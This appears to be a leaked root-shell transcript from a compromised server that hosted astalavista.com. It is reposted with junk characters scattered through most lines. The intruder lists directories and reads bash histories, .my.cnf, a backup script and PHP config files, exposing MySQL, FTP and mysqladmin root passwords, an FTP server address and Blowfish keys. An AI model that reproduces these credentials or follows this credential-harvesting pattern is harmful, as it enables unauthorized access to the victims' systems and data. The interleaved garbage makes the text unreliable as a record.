sh-3.2# cat /etc/motd" B+ J7 I+ _4 Y* Q2 a, I
#####################################################
9 u/ D7 [0 O. z w: ]#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
6 G" J: C/ O, y+ E7 k3 \, [) F# |__| [__ | |__| | |__| | | | [__ | |__| #
0 Z: p3 A& W' d1 G% {0 ~/ }$ t# | | ___] | | | |___ | | \/ | ___] | | | #
: j8 y Q& J6 a1 V$ `3 ^1 F# #
M9 _' X @+ g$ v+ u3 Z9 } O3 _##################################################### q# X# g- f g
# #( O% q$ O9 \2 W" M. e$ T
# Admin Contact - 链接标记support@secureservertech.com # a- e6 {# v: V. V
# #5 Q4 O) F3 S/ D; ~
# Available ShortCuts #
$ h. G- ?* W8 b7 e# #" Q- g. ?" l$ ]7 _- Z: Z0 M9 b
# nst - list active connections #
: O V0 m# k+ V( p# ddos - shows how many times each ip is connected #
: i5 v) o2 |; a, {0 L" _+ a# ltr - restart the webserver #- p' s; C* K1 N0 W! A
# phpc - edit the php config file #2 M- t8 m' b. B3 ~: g
# htc - edit the webserver configuration file #0 E( J8 G4 t" {( o* S; g/ ?8 z
# up - uptime #
6 G0 v0 C9 W: u# g* Q4 M' B1 ]# etd - edit the motd of the day file #% ^/ O I2 q/ k
# htr - start and restart apache if needed #
2 c& {2 I9 _: F) v; g Z! N5 e. E% b# syng - shows active SYN_RECV connections #
) A$ O* y+ P9 l8 D. [# L) W# synd - syn flood blocker - “synd -h” for usage #* W. d6 A5 Y$ e
#####################################################8 P, k- l$ F( ^; S- N) ~
# NOTES: #; ], W8 t& z8 G
# Last Upgrade - 12-08-2008 by JF #
' S0 M5 n4 w4 k2 G6 L: J# My.cnf/Mysql Optimization - 1-28-09 #3 ]2 [5 o7 ]( p' {. ?
# #
/ x: g# ~' b, ?! O# #0 `4 E- ~- w/ \8 K' O1 ?5 ]
# #9 G, L, r$ `' O% A0 @
#####################################################9 O: Z/ d' ~" Y6 Z5 F1 ^
. ]% }6 L5 p: O7 y* |sh-3.2# lastlog | grep -v Never
# T% ~% u: V. e$ T: nUsername Port From Latest" z& B; L7 t# P4 A) i$ u
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009* g" D) |$ f( |5 j' l M
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
9 e. C" `5 U, e# I) Vcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
3 @7 C3 d) Q. q. l# J7 Z$ Bastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20097 m. y" P; i7 D
6 C- P3 p- p& }6 e/ q
sh-3.2# ls -la
3 k3 Z, n ?/ Z. K& Dtotal 4533765 \3 W3 F3 L- h( v( i
drwxr-x— 15 root root 4096 Jun 4 08:40 .1 \0 G7 o; o3 z: i
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
0 \! }$ N- H4 j# T, ?7 d-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
- v# A# U3 O7 R9 w7 U0 `9 `/ o. ~1 {-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg2 X' O& c7 f% J
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history4 N6 Q7 p& Q# J
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
' B7 |) r0 Z F" w-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
% L+ {& Y8 y* W. R-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc0 }2 `6 E9 c+ Z5 F
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
" O* R* e* d* p) ?" o-rw-r–r– 1 root root 1327 Nov 29 2007 cert
4 E' V* Y3 o3 g: J) X0 c9 V-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
0 N+ r+ G6 y; ?3 S8 A- x- T& W' k% ]drwxr-xr-x 4 root root 4096 May 20 2008 .cpan' s- q x+ N# f. ?! i
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc0 p; a4 U) C$ ?) S+ K) J6 `' H3 \
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql) [1 v7 q' J. U
drwx—— 2 root root 4096 Oct 28 2007 .elinks* {7 {- l8 x+ p
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
' U W' f% O; A-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
- g$ `3 o, \" @1 o% R: \) q9 e$ }5 `( [-rw——- 1 root root 0 Apr 16 13:19 .history
& `& o/ S$ u# D$ ?7 z% I-rw-r–r– 1 root root 16095 Sep 11 2007 install.log4 B' a6 t4 F: U1 z
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
5 d% _ ?4 Z( j8 p; T& i-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh; Q r2 d. m) W) h5 d& m
-rw——- 1 root root 35 Jun 2 14:23 .lesshst) i' ?( V0 E8 p5 y
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
% W# k9 r) j+ ^3 L7 P2 }$ a E. Fdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec+ x# x; R+ n5 f& i- n6 r" h3 T
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
- Y4 N1 m4 ]! k- _3 \9 |4 G-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2 f c! f ? M- f" u
-rwx—— 1 root root 760 Sep 18 2008 lp
4 c4 `, ^2 v- i$ I0 ndrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
/ V0 U$ @5 w1 N$ l z-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
9 L" R6 n- l# b' y8 f( e-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
! J) ?5 `- z5 U' w' T, ]drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.91 H5 C/ T2 U4 e3 A
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz' |8 F& y% f* m
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
) \# m. c- W) G; J1 c: c% r-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
0 d/ J, M r3 ?3 k-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh3 n( ~6 j$ ^; t3 X( H. b: t$ g+ j
-rw——- 1 root root 41 Oct 19 2007 .my.cnf2 k' X# @) d) r" t
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history4 N2 s/ W$ f& ~9 l( u
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport9 p9 V' ?9 [) z& E3 \. o5 ~, _
-rw——- 1 root root 41 May 20 2008 .mytop( n$ b. {3 \* C5 G O1 P
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
( q8 h! h- r5 R# F-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
6 c" \( S6 c i8 I o' cdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp- i( A' n% u y9 w& O4 ^. X$ D
-rw——- 1 root root 1462 Sep 21 2007 opt.php# L" _& N, g0 O2 i
-rw-r–r– 1 root root 3371 Sep 22 2007 p* O( z0 X, X) {5 x& ]! W, `
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
7 a9 R, ^2 U& V0 W4 J-rw——- 1 root root 1024 Feb 3 21:32 .rnd. l5 o, S2 Z7 H( Q
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
$ m! n: t, P1 H$ n- K0 y, z) k-rw-r–r– 1 root root 887 Nov 28 2007 server.key& X+ b( j" K1 ]0 e, N3 C3 K% j" G
drwx—— 2 root root 4096 Oct 10 2008 .ssh
; \) Q/ v, y, e0 ^) l7 n-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
/ V) @2 j, d+ x-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc+ v! N+ R3 X" g4 x
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
9 b" o! r3 ^7 h! B2 ~/ h3 R-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1/ _$ E% K. Z# }7 b6 G, T- K( s
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
/ Z6 P; X& ~8 j-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
+ H: N3 _- l& B6 vdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.02 F/ a! Z5 C1 a* J6 h. ^6 b
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
: E/ \* e& L; a# D3 o5 e; a) Q-rw——- 1 root root 12997 May 16 2008 .viminfo/ f. q, f. g' Q9 Q+ Y( n
: L, X/ {6 \0 Z3 zsh-3.2# cat .bash_history6 @/ g6 k7 n0 Z' [
[snip]& @5 A5 |2 l5 c. y2 G7 R) S: e
wget cp4sst.com/sstlinux.tar.gz
/ [6 C' H% h7 T3 x/ |tar zxvf sstlinux.tar.gz
8 B3 y3 m- m7 M9 D% K- r5 ]& {cd linux-2.6.27.10! }( M; t* d( R: E
sh install.sh
/ |/ n7 [! t$ q/ V Lmake bzImage ; make modules ; make modules_install ; make install$ |1 ~9 y P, H3 ]7 w) s
make clean1 l2 p+ c3 A5 Q" t
service mysqld restart8 Y- k& L# G% {) z) e0 q4 t( q
[snip]# t# D' r/ |( n
cd /usr/sbin/
- X! |- H/ x, }3 Z% o# schmod 4777 traceroute
) |! Q) V+ ]7 H9 Hchmod 4777 ping- |6 r z: D8 _, Z3 r, r3 k
traceroute -I 链接标记[url]www.astalavista.ch[/url]
7 h l( k8 k/ k5 [; O" O[snip]
8 }2 S: m" u+ J# D- |) ?/ Yvi /etc/csf/csf.conf$ v& K: {. f$ v0 P
traceroute google.ch3 [2 l0 k& v9 L g b0 Z
service csf restart/ J# f, [, A" b" M7 a M
tracert google.ch
p3 X6 r9 d% C5 P0 C/ I p7 Qservice csf restart( _# ?9 m$ d' Q- v! L1 F7 k9 a
traceroute 链接标记[url]www.google.ch[/url]
2 `2 T& O* F& otracert 链接标记[url]www.google.ch[/url]
. _- ~* T# |: g! H3 ]4 Btraceroute 链接标记[url]www.google.ch[/url]
+ X$ D2 l* Z/ B3 d0 s3 c, Nlocate traceroute+ u# |$ Y: V$ N, V5 l) q
chown 4755 /bin/traceroute
' Z. { W# m, u. zchown 4777 /bin/traceroute
# e, P, _ h8 j1 G0 i$ ]1 \ }locate ping
5 A. \, h8 B0 w9 Y& hchown 4755 /bin/ping- w$ Y4 D: r6 T
chown 4777 /bin/ping. q$ d# J0 {* {3 ?5 Q) M3 @
cd /bin/
# j& c: ~+ y: Y' a1 fls -ali | grep ping
% G' r; e- h: x) @ Vchown root ping1 U- t! S/ B0 y
chmod 4755 ping4 [, f0 F# E6 [7 z+ ?
ls -ali | grep traceroute$ p" H* R' D0 D' W
chown root traceroute0 Z$ B% O9 U0 J2 ]8 B7 ^) Z
chmod 4755 traceroute
3 k# T$ U6 H6 ]" u8 wls -ali | grep traceroute
0 O" x: q0 f2 W/ R! Straceroute -I 链接标记[url]www.google.ch[/url]
8 o: }' T/ x1 T7 rtraceroute 链接标记[url]www.google.ch[/url]
, N7 }$ ^9 \8 I% X! z% kwhois pmsantos.ch
9 h3 @! h% i9 ]( b/ g[snip]1 z7 u# z$ L7 v
mysql -h com_contrexx2_live < /root/defaultp_ports.sql; R6 n8 W/ U% P: X2 @8 O( a/ J4 C
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
2 ~2 v8 d5 X0 J# |# Y! Qmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
/ |7 L: U/ L5 P! d) @- \ zmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
* R; u+ k0 ^9 x. t& O) c8 U1 W) btop
. B% ^8 p |. Vping ssth.ch
1 n6 r7 E! e! n& Q# |+ E8 T) S, J8 kping asdlkfaljgasd???ljg???lasj.ch, a. n( t/ c$ }' J5 D7 P
ping asdlkfaljgasdlasj.ch3 }5 B" i1 l3 E9 G2 {
ping 链接标记[url]www.ssth.ch[/url]
4 i0 X) z2 V+ F E$ Z! s# Cping ssth.ch/ x: e9 q( b4 ~5 P/ v* X
nslookup 链接标记[url]www.google.ch[/url]
2 d5 W6 X3 I' n& K; ^$ B L, p7 Cnslookup 链接标记[url]www.ssth.ch[/url]& {' \8 N- R! O0 q
man nslookup
7 R. G f1 \/ {4 N; n7 Oping 链接标记[url]www.google.ch[/url]" b: g5 ?+ x7 s* J! h& M
nslookup 链接标记[url]www.google.ch[/url]
0 l3 c7 ?& U; G4 \1 }nslookup 链接标记[url]www.google.ch[/url]
; \0 a, C! L0 n+ Z! Bnslookup salfjasdlf.ch2 W) X, o2 X; t: c
[snip]
1 {/ e" t! F7 W- H4 `* Kopenssl passwd -1 sadf; ^1 K: q1 j' d: l7 Y& H
openssl passwd -1 5cZNHstdTy
' l5 _6 V. h8 bmysql
- R" D* l' x4 M* S; G+ P, B; qmysql( w1 J5 E5 }9 j+ A. F
locate proftp
( M2 U2 t8 N6 `0 _vi /etc/proftpd.passwd- D* o( F" X, e
service proftpd restart
; T+ u4 ~" ^; I& Nlocate proftpd.conf' S5 v9 t" G1 n/ R a
vi /etc/proftpd.conf5 @ J: C1 |3 L1 p, L* b% o' ?
vi /etc/proftpd.passwd
9 v1 B) V$ ~# Z. nservice proftpd restart
0 J% n. V7 C2 L( G[snip]
2 N. O7 f; S- ~* E' n5 O3 M3 m/bin/sh /home/com/backup_system/backup.sh
5 N) r- v, e! q) Y( j2 R9 ^! btar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin S: n4 ]8 |2 L' E
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
) [# L" W; Y3 Y- _6 W3 `* w3 ^8 `# h5 A1 Smysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql1 r, i. @1 H' `* t/ T0 A
ls -ali0 B5 f/ I& j2 ]( e
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql3 [4 n5 k' F! Z% U8 u
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
; E6 N( d, W5 s1 m7 E+ rcrontab -l
! Z. h9 d Y; L8 ccrontab -l& L) a% p* r. P/ w
php -q /home/com/public_html/modifications/cronjobs/securitynews.php) P. J8 V4 v& k/ Y
/home/com/public_html/modifications/cronjobs/exploits.sh) A" A% s9 t% G- [, @1 C8 z1 \
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
% x2 v. M0 ?- v. D1 B1 \! Gtar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz* ]6 j( _( ]+ ~, U
cd lsws-4.0.35 o& x4 W+ o6 P7 h. Y$ m
sh install.sh. E6 T1 E4 [# c% ?
uptime
; F: h$ s( n+ W$ w/ D/ U5 Khdparm -tt /dev/sda% {* w6 b$ J+ d, U# W. W
iostat
) p# U' V* o) S yyum install iostat. i2 H9 Y2 H, k4 @! f
iostat) U( B2 e3 h5 S( W
whereis iostat
: ?% q1 `2 L, t+ U# ~) A% Q' Yyjm clean all3 G- S5 [" l& x
yum clean all ; yum -y update
4 Z1 L$ n) ]' i. f, F/ @9 `0 |iostat
: N, Q, e f$ X2 f' n. oyum install systat- Y. J& m* j W: C9 O* W
rpm -qa | grep iostat! _" ]8 j- w: ?5 j6 l1 h w# w& c
rpm -qa | grep sysstat. W5 D3 }9 C$ j' ^7 K2 v& P- y+ f
rpm -qa | grep systat* Q& h) K" @4 s1 E3 m9 l" b
dmesg -c- v' H9 r1 q5 |% h7 `
sysctl -p: R* A% o3 o% S, v* {& q4 g3 z' r
uname -r/ u& R* F& c X8 \* P& g
cd /usr/src& h5 c6 A2 w- M/ C2 F5 i
wget nix101.com/kernels/sstlinux.tar.gz d y& T+ ^5 Z% Q ?" o6 ]$ y) e
shutdown -r now
' h. w' s' j% d5 ~ h# tnano -w /boot/grub/grub.conf
; V6 X) }( }3 ~" D$ ?( C+ {
' f# o, v4 Z* ]1 h' Vsh-3.2# cat .my.cnf
& a U. S$ A+ p! y: r: M* m[client]1 X; D% I* X2 [* C0 G
user=da_admin
- I6 D% k, F& e7 jpassword=X9dctmRH
0 K5 o0 z3 A$ X8 k) s
& x+ j3 U& h W5 a6 Msh-3.2# cat /home/com/backup_system/backup.sh) o$ h+ P. m# u/ C0 }6 E
#!/bin/sh1 y; p" S5 L. q5 v, t6 \0 ?
#####################################################################9 Z0 l7 e% d( v* s
# #' O' Y9 W& \4 H8 I
# incremental backup for astalavista.com #. g2 S& Y1 t0 F* v
# #
9 |. ~( w- C, F z2 j P( T# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
9 K2 y- y7 f4 |2 m: ^' I8 \# #
! B3 J3 H; p+ X U* v#####################################################################7 W; {" W9 f2 v+ k- l
[snip]
. ]/ A+ Z% y; SPROG_DIR=”/home/com/backup_system”;# T" u# M1 k! g+ Q4 [! N
BACKUP_DIR=”/home/com/backups”;
! O0 K0 F( z" l' L: U% w1 zDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;7 g9 F1 Q5 X' @
# ftp for synology backup server
! I: a$ {9 \4 M6 X6 y6 s; _3 U; @FTP_HOST=”212.254.194.163″;
+ ^6 U( E- m/ S/ w6 A5 cFTP_PORT=”21″;
# Y3 f5 x* h; @$ v- |# UFTP_USER=”astalavista.com”;
- x* Z( N+ |7 ~ D( ~+ v9 c5 z2 OFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;3 V+ u7 @. h* c! Y4 u$ A
FTP_DIR=”/astalavista.com”;8 X/ y5 ]! j7 s5 R% D8 G/ S
# database8 r: w' R/ ?. ?5 }' A
DB_HOST=”localhost”;0 q, Y0 z* e) W, d. h. O' L d
DB_USER=”contrexxuser2″;
8 a k T* B: Y' q( ^- iDB_PASS=”0fEYNZgXz1pKe”;. l3 D7 l$ M. C6 M( @, y. R0 _
DB_DATABASE1=”com_contrexx2_live”;
: {1 R" O4 P6 c7 G3 s5 qDB_DATABASE2=”com_contrexx2″;8 c3 u% O& [0 h: l. n$ E
[snip]$ G1 D2 b: v/ O z3 U0 |
ftp -in $FTP_HOST $FTP_PORT <<EOF% u3 K n* T. g
quote USER $FTP_USER& e, n5 Y# m; f$ [, E$ A
quote PASS $FTP_PASS
0 s, X# x/ m4 ~% H3 H/ Bcd $FTP_DIR5 {1 L! ?! J' R
put $DB_FULLNAME-SQL_Dump.tar
* h2 }: ]* J% i: s3 M9 I: h) sput $BACKUP_FULLNAME-Public_HTML.tar
* Q9 ~+ r: q) vclose
2 f+ v% y0 P7 K3 _! nbye& B1 k0 j x. i% a6 x7 e- Z
EOF
) R3 o7 r' u0 [7 I3 G4 L& l) [' M
sh-3.2# cd /home$ n0 ^1 w* y6 x1 k
sh-3.2# ls -la! `/ o @' _0 f [9 q
total 120
, C9 P7 P3 S$ C. i, }0 Gdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .( C+ h' ~3 {" i, m# z4 [+ L
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..( V5 O9 |5 L: R( @
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin$ M) I% S" {' B& ~; O n, g
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
' U% e# J8 k5 g c) I-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
4 ~. I- H6 l' @" adrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet# x, n2 Q* n& X: c% Q
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup8 S+ r% X( l _/ V2 G/ w) s3 ]* K
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161% P" P3 e( A& A5 O3 ]
drwx–x–x 10 com com 4096 Apr 28 12:40 com
# g' t- U' C, fdrwxr-xr-x 2 root root 4096 May 17 2007 ftp- t: o& B2 j# _
drwx—— 3 jon jon 4096 Sep 21 2007 jon
$ `2 l1 h& A' i; k1 i2 o/ sdrwx—— 2 root root 16384 Sep 11 2007 lost+found
& C$ m4 |( z6 B2 b. R; Wdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
/ O4 _. M& @3 u; h k. k8 Idrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata! h8 Y) B& Y( b9 r I5 o
drwx—— 2 jon jon 4096 Sep 15 2007 test1 A4 v% x S2 x7 ?
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp7 O9 [1 m; V! F& }/ J
' I1 B0 [0 X1 G- M- K/ K P
sh-3.2# cd admin
; Z8 `3 E" [/ p, S+ F( u" Z8 M2 ash-3.2# ls -la
" b2 F7 |7 {7 c" Z3 Ttotal 17358963 \4 f. e4 S# b
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
# W* q; W) s! q n1 A& [drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
+ N: |! v/ \/ i" j6 udrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
/ D: c1 z& M& ^! o9 K4 rdrwx—— 2 admin admin 4096 Sep 28 2007 backups# p8 y6 i% n, B" N) p! J
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
/ O8 `8 j* T5 A6 X-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout. L9 }0 ^# f4 m" w, e* H
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile6 C* W5 b* S+ \3 r7 | H
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
$ P8 K# A; {, w, l8 b. F$ P4 E5 @drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
2 |5 Z# y- r3 h5 E( r' E, zdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
8 w* }8 p& {7 v. V* q6 ndrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
5 I; `, l$ o1 i! t, ]: v-rw-r–r– 1 root root 24 Sep 21 2007 info.php
4 R% k, ~) [# s6 ?1 U8 tdrwx—— 2 admin admin 4096 Sep 21 2007 mail. O: w( Y" m Z! i
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr) k- i/ v3 U- y7 b7 l. r: @: i) r
-rw-r–r– 1 root root 887 Nov 28 2007 server.key3 Q( M4 C; c" a8 |5 E4 K
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow: H( X c# X. ^* O
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz- o2 W* ~. l, j% @2 S
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups) x- f; U9 b/ }5 G3 g, B$ C
) D3 z$ P2 D. k/ p1 a# t6 I7 Wsh-3.2# ..
" V5 a( J; ~/ r" ~( |: f: M% tsh-3.2# cd jon+ i. `1 A9 O: I/ M: z2 h
sh-3.2# ls -la# `+ i: d- ^2 f+ m
total 36
8 a- u8 c$ @9 K! D7 h+ g2 v/ Vdrwx—— 3 jon jon 4096 Sep 21 2007 .
/ t4 n+ _' f: Vdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..+ y1 v2 @# t( W2 C8 h# T
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history2 K9 ^+ ~0 c/ _
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
" c- ], n4 q4 G2 t/ L3 F. p-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
: C% r( K) t0 ?" o2 O+ X& ]3 s7 b-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
7 j" F$ \* w; X% j: P$ {-rw-r–r– 1 root root 24 Sep 21 2007 info.php6 v. B' b% x9 S9 Y$ _1 g
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
5 S# e( g; l! r3 I4 Q% \' [' V6 G4 ~ e5 E- A8 L$ C
sh-3.2# cd ..9 Y( n2 u2 D0 p* C
sh-3.2# cd test m( f6 W# a! F0 |* G- D& g# X
sh-3.2# ls -la- u x3 [' S/ m! K
total 48
# F* C0 k# D5 @' Fdrwx—— 2 jon jon 4096 Sep 15 2007 .
5 @! ^6 k5 |7 Y3 q1 B5 Ldrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..7 x+ m7 d: T6 U
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history& [; w) d6 r, i5 a: {' J* Q
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout* i" G+ z; j$ A* W* z
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile* C) y* c' C. r- b. U
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc6 S- s' y) q7 a9 ]* a2 U' R' z
sh-3.2# cat .bash_history, ]6 Z; ?4 t' S" b' H
/usr/bin/mysqladmin -u root password PoliuJhytg67/ f+ t t, C5 Z, Y% B
( C v3 [4 C9 dsh-3.2# cd ..
8 k3 A$ T& c7 x, G# gsh-3.2# cd astanet' ]5 Z) W( h9 r# F% M/ _. {
sh-3.2# ls -la
0 q( J' J8 t" |total 52
! S( F+ j9 z' \ u. \drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
# ?; F2 W# K3 Odrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..0 L, @- T+ t8 `3 ?
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth9 f, g$ v( m4 h7 Z8 u: I! {" i
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history8 G& p9 i9 s4 \0 ?# U
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout) [) p- a( d2 n5 t9 P" a3 s5 T
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
) i# j8 I6 W( R* X-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc2 N/ |% m- |. r% }4 h( J4 c
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains8 N* p9 b" o. s |
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
* @0 a9 s- q ^! k! fdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail) H# o& g4 l( R- q' o( y! n p" p
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history3 n' G1 C8 J: [- V. _" A
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
}; c/ V: u% c7 w+ Z$ s/ k-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
1 S& h5 Y( T& l3 t, w3 g2 C3 J2 y4 D) |1 g( O4 Y! ~2 u
sh-3.2# cd auth/& D8 A: A: I: f9 K
sh-3.2# ls -la- }1 n' p$ [0 k' y- U3 Y" Z/ C
total 28
; B* \. q' o3 O# n3 C) W' Fdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
. k; E8 Y9 z0 }' S3 Idrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
+ {0 V; f9 }# X; s4 Q( @7 ~-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php5 `9 {4 b6 j/ p. }% S# S! X0 t
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php3 U0 ^, I! r1 h; f/ }2 m4 Y4 b
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
/ a' c% C1 j; Z$ E6 c) [9 ?, S-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting, w* P1 v/ M* J$ U& ?$ \
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
) j% D- k" T" O/ D% J2 B0 m! g; i) Y8 J6 B }% C& ]3 V
sh-3.2# cat hackercontest.config.inc.php# M# b% Q$ F. S: o: v7 O
<?PHP! [5 C0 L$ ~# e" K
// Variabeln f?r Verbindung zur Datenbank //
! S+ V, B& ~" i) q$conxHost = ‘localhost’; // MySQL hostname: I; C* V7 I" D! X" _. @( A# K
$conxUser = ‘hackercontest’; // MySQL user; ?* a( S6 K8 ?8 A; N; F7 F+ ~1 U
$conxPassword = ‘K6m@7dUc’; // MySQL password. I% F: O2 K! X$ d- z
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
0 L+ S, {/ V# ]% \7 P" I?>4 Q1 r) V# m: ? k# \
sh-3.2# cat hosting.config.inc.php
0 s( l+ ~- w' |7 M<?PHP, ^- q5 i% Y7 E& s' Q
// Variabeln f?r Verbindung zur Datenbank //
& W2 f; `( }% j) m( w9 V+ e$conxHost = ‘localhost’; // MySQL hostname
6 V) j: G5 E6 T" V/ a$conxUser = ‘hostinguser’; // MySQL user, q+ m5 p" X! M$ Y- C4 f
$conxPassword = ‘cXvB3981′; // MySQL password
d& ]' U3 I0 g1 o8 {$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
! o, [" c4 T, G9 [?>
0 r" i9 J! ]4 u
2 j0 E2 A2 T$ W! j* R/ ash-3.2# cd .. {$ `1 I# Q1 K# H+ [' U( \( b; t. s
sh-3.2# cd com
" M$ N# s' l3 Q1 r3 [$ F0 gsh-3.2# ls -la4 L% f( m; S1 b6 T) _9 }3 M
total 141208
) J# [: {% w, ~5 W8 Y' R- Cdrwx–x–x 10 com com 4096 Apr 28 12:40 .+ c! ^' }4 W3 G0 N2 q2 x
